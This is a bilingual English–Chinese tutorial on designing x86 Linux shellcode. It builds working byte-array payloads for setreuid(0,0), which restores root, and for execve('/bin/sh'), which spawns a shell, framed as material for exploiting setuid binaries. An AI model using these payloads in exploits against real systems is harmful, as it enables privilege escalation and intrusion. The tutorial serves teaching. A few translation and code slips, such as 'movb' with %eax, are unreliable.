You are on page 1of 20

DESIGNING SHELLCODE DEMYSTIFIED

SHELLCODE 設計解密
原文:murat at enderunix dot org
翻譯:PSHuang [PSNLAB]

目錄
  0x00 前序 ....................................................................................................................................................... 1

  0x01 SHELLCODE 為何物? ........................................................................................................................... 2

  0x02 系統呼叫 ............................................................................................................................................... 3

  0x03 產生介殼程式的 SHELLCODE ............................................................................................................ 12

  0x04 後詙 ..................................................................................................................................................... 19

  0x05 銘謝 ..................................................................................................................................................... 19

  0x06 文獻 ..................................................................................................................................................... 19

 FORE WORD
 0x00 前序
In our previous paper, Buffer Overflows Demystified, we told you that there will be more papers
on these subjects. We kept our promise. Here is the second paper from the same series. The paper is about
the fundamentals of shellcode design and totally Linux 2.2 on IA-32 specific. The base principles apply to all
architectures, whereas the details might obviously not.
在前文「緩衝區溢出解密」提到,會撰寫更多有關這個主題的文章。筆者保持承諾,當前所
見為此系列的第二篇文章。 該文有關 SHELLCODE 於 IA-32 架構中 Linux 2.2 系統核心上的基礎知識。
應用到所有架構上的基礎原理皆是如此,本文將不再次詳述那些妳本該知道的。

To understand what's going on, some C and assembly knowledge is required. Virtual Memory,
some Operating Systems essentials, like, for example, how a process is laid out in memory will be helpful.
You MUST know what a setuid binary is, and of course you need to be able to at least use UNIX systems. If
you have an experience of gdb/cc, that is something really really good. Keep “IA-32 Intel® Architecture
Software Developer's Manual Volume 1: Basic Architecture" at hand. You can get it from here.
想瞭解接下來要作什麼,則需要一些關於 C 與 Asm 的知識。 有關虛擬記憶體與作業系統
的要點,亦同於上。 舉例來說:行程如何運作於記憶體中與其實際分佈狀況。 讀者必須知道什麼是
setuid 二進制檔案,當然也必須會操作 Unix 系統。 假若曾有過對於 gdb/cc 工具的使用經驗,那當
然更好。 最後別忘經常關注官方手冊:「IA-32 Intel® Architecture Software Developer's Manual Volume
1: Basic Architecture」,可於下列網址獲得該手冊。

Recent versions of the paper can be found here.

1/20
可於下列網址尋獲當前版本的論文。

 WHAT'S SHELLCODE?
 0x01 SHELLCODE 為何物?
In our previous paper, I told several times that, once we get control over the execution of the
target program, we can run any code we want, let's remember:
在之前的篇章,筆者曾數次提及,一旦獲取對目標程式的控制執行,那麼就能執行任何想要
的代碼,接著請記住以下內容:
"strcpy() copied large_one to foo, without bounds checking, filling the whole stack with A,
starting from the beginning of foo1, EBP-16.

Now that we could overwrite the return address, if we put the address of some other memory
segment, can we execute the instructions there? The answer is yes.

Assume that we place some /bin/sh spawning instructions on some memory address, and we put
that address on the function's return address that we overflow, we can spawn a shell, and most
probably, we will spawn a rootshell, since you'll be already interested with setuid binaries." [5]

Strcpy() 複製 large_one 的陣列內容到 foo 中,而忽略邊界檢查,則堆疊將會以字元 A 填
滿,那麼從 EBP-16 的位址之後開始演繹我們的把戲。

既然可以覆寫返回位址,那麼把它放入其他記憶體的位址區段,就可以在那裡執行我們要的
嗎?答案當然不容否定。

假若將生成 /bin/sh 的指令置於某個記憶體位址,然後我們將要溢出之後要執行的位址替代


函數的返回位址, 執行之後生成一個 shell,相信大家對於 setuid 二進制檔案都有興趣,
所以大多數的情況,會選擇生成一個獲取系統控制的 root shell。
」[5]

Again, if you would recall, the instructions the CPU will likely to run are placed in some portion of
memory. What we simply do is to place our code somewhere in the memory and make EIP point to it.
再次重申,假如妳還記得的話, CPU 的指令會執行在某些記憶體部位的資料。 我們純粹要
作的只有將欲執行的代碼放到記憶體的某處,遂讓 EIP 指向所在的位址。

We name these assembly instructions "the shellcode". To use it within an exploit, we put their
hexadecimal op-codes in a character array.
我們將這些個組合語言指令稱為「SHELLCODE」。 有意在弱點利用程序(exploit)中使用,
得將這些十六進制操作碼(op-codes)放入字元陣列中。

Several methods are available to get those instructions:

2/20
獲得這類的組合語言指令有以下有幾種方式:
1. Write directly in hex code
2. Write the assembly instructions, then extract the op-codes
3. Write in C, extract assembly instructions and then op-codes
1. 直接撰寫成十六進制機器碼。(譯者:聽說 jserv 長輩都這樣幹!@_@)
2. 以組合語言撰寫,由組譯過程中,提出組合語言代碼中操作碼(op-codes)部分。
3. 反組譯 C 語言撰寫的代碼,提取組語指令後,篩選出操作碼(op-codes) 部分。

We'll first use the third method and try to run some system calls like exit. Soon, we'll write a
shellcode to spawn a new shell.
通常優先採用第三種方法,並嘗詴執行某些系統呼叫,諸如:exit()。 稍後,將撰寫一個生
成 shell 的 SHELLCODE。

The code we'd like to run will usually be the execution of a system program, e.g. Spawning a
root shell or binding a root shell to a newly created socket if it'll run remotely. When we talk about
"executing a program", we mean "calling a kernel service which will be responsible for creating and
executing a new system process". These services run in the most privileged CPU level, namely kernel mode.
We'll need an entry to the kernel for these sorts of services. These services are available to user-space
programs via system calls. Thus, to understand what's all about shellcode, we'll first need to dive into
system calls.
該代碼(譯者註:指 SHELLCODE)通常透過遠端的系統程式執行,例如:生成一個 root shell
或者生成一個 root shell 於新建立的遠端 socket 連線上。 每當談到「執行程式」則表示「以呼叫核
心服務的方式,創立或執行一個新的行程」。 該類服務通常運行於 CPU 特權等級上,為眾所皆知
的核心模式,我們需要該類服務對核心的進入點(Entry)。 而這類經由系統呼叫的服務,位於使用
者(userspace)程式中。 因此,想瞭解 SHELLCODE 是為何物,我們將首先深入探討系統呼叫。

 SYSTEM CALLS
 0x02 系統呼叫
Entrances into the kernel can be categorized according to the event or action
that initiates it:
由事件或動作進入核心模式初始化有下列幾種方式:

1. Hardware Interrupt.
2. Hardware trap.
3. Software initiated trap.
1. 硬體中斷模式。
2. 硬體觸發陷阱。
3. 軟體觸發陷阱。

3/20
Hardware interrupts arise from external events, such as an I/O device needing attention or a clock
reporting passage of time. Hardware interrupts occur asynchronously and may not relate to the context of
the currently executing process.
硬體中斷由外部事件觸發,例如:一個 I/O 裝置的運作需仰賴,時脈訊號回報的經過時間。 硬體中
斷模式以非同步形式發生,且不會涉及到當前運作行程的上下動作。

Hardware traps may be either synchronous or asynchronous, but are related to the current executing
process. Examples of hardware traps are those generated as a result of an illegal arithmetic operation,
such as divide by zero.
硬體觸發陷阱既可同步或異步地運作,但是其中與當前執行的行程有關。 硬體單步偵錯通常由非法
算術運算所導致,例如:碰到除以零的情況。

Software initiated traps are used by system to force the scheduling of an event such as process
rescheduling or network processing, as soon as possible. System calls are a special case of software
initiated trap -the machine instruction used to initiate a system call typically causes a hardware trap that is
handled specially by the kernel. The most frequent trap into the kernel (after clock processing) is a
request to do a system call. The system call handler must do the following work:
軟體觸發陷阱為觸發事件的調度機制,用來盡快重新行程安排或網路處理。 系統呼叫則為軟體單步
偵錯中的特殊案例 - 機器指令慣用於發起系統呼叫,通常會導致硬體單步偵錯,此特殊情況由核心
處理。 進入核心模式的單步偵錯(在一個時脈訊號之後)多為系統呼叫。 系統呼叫處理函數必須進
行下列作業:

1. Verify that the parameters to the system call are located at a valid user address and copy them from
the user's address space into the kernel
2. Call a kernel routine that implements the system call.[2]
1. 檢查對系統呼叫的參數位址是否有效,並將之由使用者記憶體空間複製到核心記憶體空間中。
2. 呼叫核心常式實現系統呼叫。[2]

There are two mechanisms under Linux for implementing system calls:
Linux 系統下實作系統呼叫的機制有以下兩種:
1. lcall7/lcall27 gates
2. INT 0x80 software interrupt
1. Lcall17/lcall27 呼叫閘道
2. INT 0x80 軟體中斷訊號

Native Linux programs use int 0x80 whilst binaries from foreign flavors of UNIX (Solaris, UnixWare 7 etc.)
use the lcall7 mechanism. The name "lcall7" is historically misleading because it also covers lcall27 (e.g.
Solaris/x86), but the handler function is called lcall7_func.

4/20
原生 Linux 程式使用 int 0x80 軟體中斷,而(譯者註:whilst == while in Britain English.)外來的 Unix
系統的二進制檔案(例如:Solaris, Unix Ware 7 系統等)則使用 lcall7 機制。 至於 lcall7 一詞沿誤日
久,原因是該機制尚且涵蓋 lcall27(例如:Solaris/x86 系統),但處理函數仍統稱為 lcall7_func。

When the system boots, the function arch/i386/kernel/traps.c:trap_init() is called which sets up the IDT
(Interrupt Descriptor Table) so that vector 0x80 (of type 15, dpl 3) points to the address of system_call
entry from arch/i386/kernel/entry.S.
當系統啟動時,呼叫函數 arch/i386/kernel/traps.c:trap_ini() 設定 IDT(Interrupt Descriptor Table - 中
斷敘述表)導致中斷向量 0x80(型態 15,敘述子特權等級 13)指向 system_call 入口處的所在位
址,而該向量則宣告於 arch/1386/kernel/entry.S 中。

When a userspace application makes a system call, the arguments are passed via registers and the
application executes 'int 0x80' instruction. This causes a trap into kernel mode and processor jumps to
system_call entry point in entry.S.
當使用者(userspace)應用程式引發系統呼叫時,則參數會經由暫存器傳遞且該應用程式執行 ‘int 0x80’
指令。 這將進入核心的單步偵錯模式且處理器也會跳躍至位於 entry.S 中的 system_call 入口處。

What this generally does is:


總體而言,幹了以下這些事:
1. Saves registers and conducts some sanity checking.
2. Call the particular system_call handler function to handle the system call.[3]
1. 儲存 CPU 內暫存器數值並作相關的調理檢查。
2. 呼叫特定的 system_call 處理函數操縱系統呼叫。

EAX register denotes the specific system call. Other registers have relative meanings according to the value
in EAX register.
EAX 暫存器表示特定系統呼叫。 其他暫存器的相關意義,則根據儲存於 EAX 暫存器中的數值。

To give an example, let us assume that a process requested _exit. Before going into kernel mode, the
underlying library functions set EAX to 0x1 which denotes sys_exit, set EBX the parameter given to exit()
and executes int 0x80. When the trap occurs, kernel locates the appropriate handler routine. In this
scenario, since EAX is 0x1, kernel/exit.c:sys_exit is executed. This function operates according to the value
that is present in EBX register.
舉例來說,假設有一個行程要求 _exit 動作。 於進入核心模式之前,下方的函數庫式設定 EAX 暫存
器為 0x01 這代表 sys_exit,設定 EBX 為傳遞到 exit() 的參數,之後執行 int 0x80。 當陷阱模式發
生時,核心定位到適切的處理常式(handler routine) 。 在該次演練中,因為 EAX 暫存器數值為 0x01,
而 kernel/exit.c:sys_exit 被執行。 這個函數將根據表現於 EBX 暫存器中的數值進行相關操作。

5/20
Now that we've gone through the mechanisms involved in system calls and how they actually work, we can
start invoking them from our assembly instructions. Once we get the instructions, we'll find the
hexadecimal opcode for them, put them in an array and create our shellcode.
既然我們透徹瞭解涉及系統呼叫的機制與運作,就可以開始運用在組合語言指令中。 一旦得到這些
指令,我們也會從中得十六進制的 opcode,之後將他們放在字元陣列形成 shellcode。

EXIT SHELLCODE

Let's first code in C, and see for ourselves:

$ export CFLAGS=-g

----------------------- c-exit.c ------------------------------


#include <stdlib.h>

main()
{
exit(0);
}
----------------------- c-exit.c ------------------------------

$ make c-exit
cc -g c-exit.c -o c-exit
$ gdb ./c-exit
(gdb) b main
Breakpoint 1 at 0x80483b7: file c-exit.c, line 5.
(gdb) r
Starting program: /home/balaban/sc/./c-exit
warning: Unable to find dynamic linker breakpoint function.
GDB will be unable to debug shared library initializers
and track explicitly loaded dynamic code.

Breakpoint 1, main () at c-exit.c:5


5 exit(128);
(gdb) disas _exit
Dump of assembler code for function _exit:
0x400a5ee0 <_exit>: mov %ebx,%edx
0x400a5ee2 <_exit+2>: mov 0x4(%esp,1),%ebx
0x400a5ee6 <_exit+6>: mov $0x1,%eax

6/20
0x400a5eeb <_exit+11>: int $0x80
--kesildi---

End of assembler dump.


(gdb)

As you can see above, standard library function exit sets EAX to 0x1 and EBX to the
parameter pushed onto the stack(parameter to the function, which is the actual exit status).
由上方所視,標準函數庫式 exit 設定 EAX 暫存器數值為 0x01 且把 EBX 暫存器
數值當作參數 push 到堆疊中(參數傳遞至函數,則為真實的結束狀態)。

So, here are the instructions for exit(0):


以下為等效 exit(0) 的組合語言指令:

XOR %EBX, %EBX /* return code for exit(), set EBX zero.*/
MOV $0x1, %EAX /* sys_exit*/
INT 0x80 /* Generate trap*/

A user-friendly version of Linux System Call table can be found in the following link.
一個較為友善的 Linux 系統呼叫表,可以在此處連結獲得。

sys_exit is defined as such:


sys_exit 結構如下定義:

%eax Name Source %ebx %ecx %edx %esx %edi


1 sys_exit kernel/exit.c int - - - -

We can write the instructions inline in a C function:


我們可以在 C 語言函數中撰寫 inline 組合語言:

----------------------- a-exit.c ------------------------------


main()
{
__asm__("
xorl %ebx, %ebx
mov $0x1, %eax
int $0x80
");

7/20
}
----------------------- a-exit.c ------------------------------

We can trace the system calls within a program's execution time with strace:
我們可在程式執行時期以 strace 指令追蹤系統呼叫:

$ strace ./a-exit
execve("./a-exit", ["./a-exit"], [/* 32 vars */]) = 0
brk(0) = 0x80494d8

--- snipped ---

_exit(0) = ?
$

As you can see, exit(0) has been executed!


現在妳應該看到 exit(0) 被執行了!

We can move onto another sytem call:


然後就可以輪到另一個系統呼叫:
setreuid(0, 0)

Sometimes we may be in need of some "privilege restoration routines" which restore a given process' root
privileges whenever they are processed by it but are temporarily unavailable because of some security
reasons. These routines are especially useful for exploiting vulnerabilities in certain setuid binaries, the
ones that revert but do not completely drop their elevated privileges. setreuid is one of them, and sets the
process' real and effective user ids. [4]
由於預設行程基於安全因素考量暫時不存在 root 特權,有時候我們需要「特權恢復常式」對所指定
的行程還原 root 特權。這些常式位於 setuid 二進制檔案,恢復但不完全拿掉他們的提昇特權,對
撰寫弱點利用代碼特別有用。 setreuid 則為其中之一,指派真實且有效的特權身份給行程。[4]

From the above given URI, you can get some information about this system call:
由上述的連結中,妳可以獲得有關該系統呼叫的相關資訊:

%eax Name Source %ebx %ecx %edx %esx %edi


70 sys_setreuid kernel/sys.c uid_t - - - -

Same principles apply here. We set EAX 0x46 which is sys_setreuid's value,

8/20
EBX to the real userid and ECX to the effective userid.
同理於此。 將 EAX 暫存器設定成 0x46,為 sys_setreuid 常數,
EBX 暫存器對應真實 userid 且 ECX 暫存器對應有效 userid。

----------------------- a-setreuid.c ------------------------------


main()
{
__asm__("
xorl %ebx, %ebx
xorl %ecx, %ecx
mov $0x46, %eax
int $0x80
xorl %ebx, %ebx
mov $0x1, %eax
int $0x80
");

}
----------------------- a-setreuid.c ------------------------------

xorl %ebx, %ebx


Set EBX register 0. If you XOR some number with itself, you get zero.
Remeber that EBX is the real userid part.
將 EBX 暫存器歸零。 假如以本身進行互斥或運算,結果為零。
記得 EBX 暫存器為真實的 userid 一部分。

xorl %ecx, %ecx


ECX = effective userid = 0
ECX = 有效的 userid = 0

mov $0x46, %eax


EAX = 0x46.

int $0x80
Dive into kernel mode.
導入核心模式。

Other instructions after this are the ones for exit(0);


上述之後的為實現 exit(0); 所需的指令:

9/20
$ make a-setreuid
cc a-setreuid.c -o a-setreuid
$ su
# strace ./a-setreuid
execve("./a-setreuid", ["./a-setreuid"], [/* 31 vars */]) = 0
brk(0) = 0x80494e4

---- snipped ----

setreuid(0, 0) = 0
_exit(0) = ?
#

As you can see, first setreuid(0, 0) and then exit(0) has been executed. It's time we extract the opcode for
these instructions. In GDB, x/bx command shows one byte unit from memory we specify. This is what we
want. For a detailed walkthrough on x/bx, you can have a look at here.
妳看阿,首先 setreuid(0,0) 與 exit(0) 已被執行。 終於到了從組合語言指令把 opcode 抽出來的時
候。在 GDB 中,x/bx 指令顯示我們從記憶體中指定的一個位元組。而上面就是我們要的結果。至於
對於 x/bx 指令的詳細運用妳可以參考這裡。

$ gdb ./a-setreuid
(gdb) disas main
Dump of assembler code for function main:
0x8048380 <main>: push %ebp
0x8048381 <main+1>: mov %esp,%ebp
0x8048383 <main+3>: xor %ebx,%ebx
0x8048385 <main+5>: xor %ecx,%ecx
0x8048387 <main+7>: mov $0x46,%eax
0x804838c <main+12>: int $0x80
0x804838e <main+14>: xor %ebx,%ebx
0x8048390 <main+16>: mov $0x1,%eax
0x8048395 <main+21>: int $0x80
0x8048397 <main+23>: leave
0x8048398 <main+24>: ret
End of assembler dump.
(gdb) x/bx main+3
0x8048383 <main+3>: 0x31
(gdb) x/bx main+4
0x8048384 <main+4>: 0xdb

10/20
(gdb) x/bx main+5
0x8048385 <main+5>: 0x31
(gdb) x/bx main+6
0x8048386 <main+6>: 0xc9
(gdb) x/bx main+7
0x8048387 <main+7>: 0xb8
(gdb) x/bx main+8
0x8048388 <main+8>: 0x46
(gdb) x/bx main+9
0x8048389 <main+9>: 0x00
(gdb) x/bx main+10
0x804838a <main+10>: 0x00
(gdb) x/bx main+11
0x804838b <main+11>: 0x00
(gdb) x/bx main+12
0x804838c <main+12>: 0xcd
(gdb) x/bx main+13
0x804838d <main+13>: 0x80
(gdb) x/bx main+14
0x804838e <main+14>: 0x31
(gdb) x/bx main+15
0x804838f <main+15>: 0xdb
(gdb) x/bx main+16
0x8048390 <main+16>: 0xb8
(gdb) x/bx main+17
0x8048391 <main+17>: 0x01
(gdb) x/bx main+18
0x8048392 <main+18>: 0x00
(gdb) x/bx main+19
0x8048393 <main+19>: 0x00
(gdb) x/bx main+20
0x8048394 <main+20>: 0x00
(gdb) x/bx main+21
0x8048395 <main+21>: 0xcd
(gdb) x/bx main+22
0x8048396 <main+22>: 0x80
(gdb)

Our shellcode:
我們的 shellcode:

11/20
----------------------- s-setreuid.c ------------------------------
char sc[] = "\x31\xdb" /* xor %ebx, %ebx */
"\x31\xc9" /* xor %ecx, %ecx */
"\xb8\x46\x00\x00\x00" /* mov $0x46, %eax */
"\xcd\x80" /* int $0x80 */
"\x31\xdb" /* xor %ebx, %ebx */
"\xb8\x01\x00\x00\x00" /* mov $0x1, %eax */
"\xcd\x80"; /* int $0x80 */

main()
{
void (*fp) (void);

fp = (void *)sc;
fp();
}
----------------------- s-setreuid.c ------------------------------

$ su
# make s-setreuid
cc s-setreuid.c -o s-setreuid
# strace ./s-setreuid
execve("./s-setreuid", ["./s-setreuid"], [/* 31 vars */]) = 0
brk(0) = 0x80494f8

---- snipped

setreuid(0, 0) = 0
_exit(0) = ?
#

As seen, the same effect with the shellcode.


看吧,執行結果與 shellcode 一致。

 SHELL SPAWNING SHELLCODE


 0x03 產生介殼程式的 SHELLCODE

12/20
This is the sweetest part. Basing what we've learnt so far, let’s try
coding a shellcode which spawns an interactive shell. The first thing we should
do is to analyze execve system call a little bit in detail. Go to the URI I've
given above and get some idea:
苦盡甘來終有時。 根據目前所學,嘗詴製作一個可以產生交談式介殼程式(shell)的 shellcode。
首先要做的就是分析一點系統呼叫細節。 往上找出我給的那個連結,遂得下表資訊:

%eax Name Source %ebx %ecx %edx %esx %edi


11 sys_execve arch/i386/kernel/process.c pt_regs - - - -

EBX has the address of pt_regs structure. Not much explanatory.


The handler is in arch/i386/kernel/process.c. Let's see it:
EBX 暫存器內儲存 pt_regs 的結構,不用多加解釋。
處理機制於 arch/i386/kernel/process.c 中,如下所示:

/*
* sys_execve() executes a new program.
*/
asmlinkage int sys_execve(struct pt_regs regs)
{
int error;
char * filename;

filename = getname((char *) regs.ebx);


error = PTR_ERR(filename);
if (IS_ERR(filename))
goto out;
error = do_execve(filename, (char **) regs.ecx, (char **) regs.edx,
&regs);
if (error == 0)
current->ptrace &= ~PT_DTRACE;
putname(filename);
out:
return error;
}

As you'd notice, EBX register has the address of the command, which, in this scenario, is the address of
string "/bin/sh". We cannot get any more clue as to what ECX and EDX do. However look, the routine calls
another function, do_execve and passes these addresses to that. To understand what these really are, we
need to go further:

13/20
我想妳已經注意到,EBX 暫存器中儲存命列的位址,在該次演練中,則是字串 /bin/sh 的位址。 我
們無法從中獲取任何有關 ECX 與 EDX 暫存器工作的線索。 然而經過觀察,這些常式呼叫 do_execve
函數並把位址傳遞給它。 要瞭解真正的作用,我們需要更深入探討:
From fs/exec.c:
由 fs/exec.c 中:

int do_execve(char * filename, char ** argv, char ** envp, struct pt_regs * regs)

Here, it's obvious that ECX has the address of argv[] and EDX has the address of env[]. They are pointers
to character arrays. Environment variables can be set to NULL, which means we can have a zero in EDX,
however, we need to supply argv[0] the name of the program at least. Since argv[] will be NULL terminated,
argv[1] will be zero also.
於該處,ECX 暫存器很明顯地儲存 argv[] 的位址,而 EDX 暫存器則為 env[] 的位址。 而這兩者為
指標對字元陣列的資料型態。 環境變數可以為空,這表示可以將 EDX 暫存器歸零,然而我們至少要
提供 argv[0] 表程式的名稱與路徑。 因為 argv[] 以 ‘0’ 為字串結尾,因此 argv[1] 也必須為零。

So we'll need to:


所以我們得作:
* have the string "/bin/sh" somewhere in memory
* write the address of that into EBX
* create a char ** which holds the address of the
former "/bin/sh" and the address of a NULL.
* write the address of that char ** into ECX.
* write zero into EDX.
* issue int 0x80 and generate the trap.
*在記憶體的某處有 /bin/sh 字串。
*把位置寫到 EBX 暫存器中。
*宣告一個字元陣列(指指標)
保存 /bin/sh 字串與 ‘0’ 結尾。
*將字元陣列位址寫入 EBX 暫存器中。
*把 EDX 暫存器歸零。
*呼叫 int 0x80 並進入陷阱模式。

Let's start typing:


讓我們著手書寫:

First write a NULL terminated "/bin/sh" into memory. We can


do this by pushing a NULL and an adjacent "/bin/sh" into stack:
首先對記憶體寫入以零為結尾的 /bin/sh 字串。
方法是 push 緊鄰字元 0 的 /bin/sh 到堆疊中:

14/20
create a NULL in EAX. This will be used for terminating the string:
將 EAX 暫存器歸零。 我們用它來結束字串。
xorl %eax, %eax

push that zero (null) into stack:


將零(null)push 至堆疊中:
pushl %eax

push "//sh":
將 //sh 字串 push 至堆疊中:
pushl $0x68732f2f

push "/bin":
將 /bin 字串 push 至堆疊中:
pushl $0x6e69622f

At this moment, ESP points at the starting address of "/bin/sh".


We can safely write this into EBX:
這個時候,ESP 暫存器指向 /bin/sh 的起始位址。
我們可以安全地寫入 EBX 暫存器中。
movl %esp, %ebx

EAX is still zero. We can use this to terminate char **argv:


我們可以透過 EAX 暫存器歸零來結束 **argv 字元陣列。
pushl %eax

If we push the address of "/bin/sh" into stack too, the address of the pointer to character
array argv will be at ESP. In this way, we have created the char **argv in the memory:
假如我們也將 /bin/sh 的位址 push 至堆疊中,那指向字元陣列 argv 的指標會
出現在 ESP 暫存器。 以該方式,我們可以在記憶體中建立一個等效的 **argv。
pushl %ebx

And write the address of argv into ECX:


接著寫入 argv 的位址到 ECX 暫存器中:
movl %esp, %ecx

EDX may happily be zero:


或許 EDX 暫存器樂意歸零:
xorl %edx, %edx

15/20
sys_execve = 0xb. That should be in EAX:
sys_execve = 0xb. 那 EAX 暫存器該為:
movb $0xb, %al

Trigger the interrupt and enter kernel mode:


觸發中斷並進入核心模式:
int $0x80

----------------------- sc.c ------------------------------


main()
{
__asm__("
xorl %eax,%eax
pushl %eax
pushl $0x68732f2f
pushl $0x6e69622f
movl %esp, %ebx
pushl %eax
pushl %ebx
movl %esp, %ecx
xorl %edx, %edx
movb $0xb, %eax
int $0x80"
);
}
----------------------- sc.c ------------------------------

$ make sc
cc -g sc.c -o sc
$ ./sc
sh-2.04$

It works. Let's find the opcode line by line and construct our shellcode:
這法子管用。 讓我們逐行地找出 opcode 並作成 shellcode:

$ gdb ./sc
(gdb) disas main
Dump of assembler code for function main:

16/20
0x8048380 <main>: push %ebp
0x8048381 <main+1>: mov %esp,%ebp
0x8048383 <main+3>: xor %eax,%eax
0x8048385 <main+5>: push %eax
0x8048386 <main+6>: push $0x68732f2f
0x804838b <main+11>: push $0x6e69622f
0x8048390 <main+16>: mov %esp,%ebx
0x8048392 <main+18>: push %eax
0x8048393 <main+19>: push %ebx
0x8048394 <main+20>: mov %esp,%ecx
0x8048396 <main+22>: xor %edx,%edx
0x8048398 <main+24>: mov $0xb,%al
0x804839a <main+26>: int $0x80
0x804839c <main+28>: leave
0x804839d <main+29>: ret
End of assembler dump.
(gdb) x/bx main+3
0x8048383 <main+3>: 0x31
(gdb) x/bx main+4
0x8048384 <main+4>: 0xc0
(gdb)
0x8048385 <main+5>: 0x50
(gdb)
0x8048386 <main+6>: 0x68
(gdb)
0x8048387 <main+7>: 0x2f
(gdb)
0x8048388 <main+8>: 0x2f
(gdb)
0x8048389 <main+9>: 0x73
(gdb)
0x804838a <main+10>: 0x68
(gdb)
0x804838b <main+11>: 0x68
(gdb)
0x804838c <main+12>: 0x2f
(gdb)
0x804838d <main+13>: 0x62
(gdb)
0x804838e <main+14>: 0x69

17/20
(gdb)
0x804838f <main+15>: 0x6e
(gdb)
0x8048390 <main+16>: 0x89
(gdb)
0x8048391 <main+17>: 0xe3
(gdb)
0x8048392 <main+18>: 0x50
(gdb)
0x8048393 <main+19>: 0x53
(gdb)
0x8048394 <main+20>: 0x89
(gdb)
0x8048395 <main+21>: 0xe1
(gdb)
0x8048396 <main+22>: 0x31
(gdb)
0x8048397 <main+23>: 0xd2
(gdb)
0x8048398 <main+24>: 0xb0
(gdb)
0x8048399 <main+25>: 0x0b
(gdb)
0x804839a <main+26>: 0xcd
(gdb)
0x804839b <main+27>: 0x80
(gdb)

----------------------- sc.c ------------------------------


char sc[] =
"\x31\xc0" /* xor %eax, %eax */
"\x50" /* push %eax */
"\x68\x2f\x2f\x73\x68" /* push $0x68732f2f */
"\x68\x2f\x62\x69\x6e" /* push $0x6e69622f */
"\x89\xe3" /* mov %esp,%ebx */
"\x50" /* push %eax */
"\x53" /* push %ebx */
"\x89\xe1" /* mov %esp,%ecx */
"\x31\xd2" /* xor %edx,%edx */

18/20
"\xb0\x0b" /* mov $0xb,%al */
"\xcd\x80"; /* int $0x80 */

main()
{
void (*fp) (void);

fp = (void *)sc;
fp();
}
----------------------- sc.c ------------------------------

$ make s-sc
cc -g s-sc.c -o s-sc
$ ./s-sc
sh-2.04$

 LAST WORD
 0x04 後詙
Using the afore mentioned logic, one can construct millions of
fantastic shellcode. What is necessary is a little bit attention.
只要有心按表操課,人人都可以學會寫 shellcode。(譯者註:星爺電影好棒的說!)

- Murat Balaban
murat at enderunix dot org

 GREETINGS
 0x05 銘謝
a, da, aleph1, lsd-pl guys, Mr. Brown, cronos, gargoyle, matsuri

 Bibliography
 0x06 文獻

[1] Linux Kernel Internals


Beck M et al, Addison Wesley, (1997) 2nd edition.

[2] The Design and Implementation of the 4.4BSD Operating System


McKusick M et al, Addison Wesley, 1996.

19/20
[3] IA-32 Intel® Architecture Software Developer's Manuals

[4] Unix Assembly Codes Development for Vulnerabilities Illustration Purposes

[5] Buffer Overflows Demystified

[6] Linux 2.2 Kernel Sources

20/20